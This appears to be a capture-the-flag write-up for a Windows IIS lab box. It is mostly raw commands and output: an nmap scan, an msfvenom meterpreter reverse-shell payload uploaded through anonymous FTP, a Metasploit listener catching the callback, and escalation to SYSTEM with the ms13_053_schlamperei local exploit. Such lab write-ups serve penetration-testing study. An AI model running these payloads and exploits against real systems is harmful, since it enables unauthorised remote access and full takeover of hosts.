Nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 21:06 MST
Nmap scan report for 10.129.28.254
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
| 12-22-22 01:27AM 897112 r.aspx
| 12-22-22 01:17AM 2921 rev.aspx
| 12-22-22 01:06AM 2935 reverse.aspx
|_03-17-17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds
User
Generate payload with msfvenom
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f aspx > r.aspx
Upload to FTP with anonymous login we noticed from nmap
❯ ftp anonymous@10.129.28.254
Connected to 10.129.28.254.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put r.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
12-22-22 01:27AM 897112 r.aspx
12-22-22 01:17AM 2921 rev.aspx
12-22-22 01:06AM 2935 reverse.aspx
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> rm rev.aspx
550 The directory name is invalid.
ftp>
Setup listener within metasploit and visit http://10.129.28.254/r.aspx
msf6 exploit(multi/handler) > set lhost 10.10.16.18
lhost => 10.10.16.18
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 10.10.16.18 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700
meterpreter >
meterpreter > getuid
Server username: IIS APPPOOL\Web
Privilege Escalation
Now search exploit suggester.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated.
8 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
9 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
11 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
12 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
13 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
Winner winner!
msf6 exploit(windows/local/ms13_053_schlamperei) > exploit
[*] Started reverse TCP handler on 10.10.16.18:4443
[*] Launching notepad to host the exploit...
[+] Process 2724 launched.
[*] Reflectively injecting the exploit DLL into 2724...
[*] Injecting exploit into 2724...
[*] Found winlogon.exe with PID 432
[*] Sending stage (175686 bytes) to 10.129.28.254
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700
meterpreter > getui
[-] Unknown command: getui
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM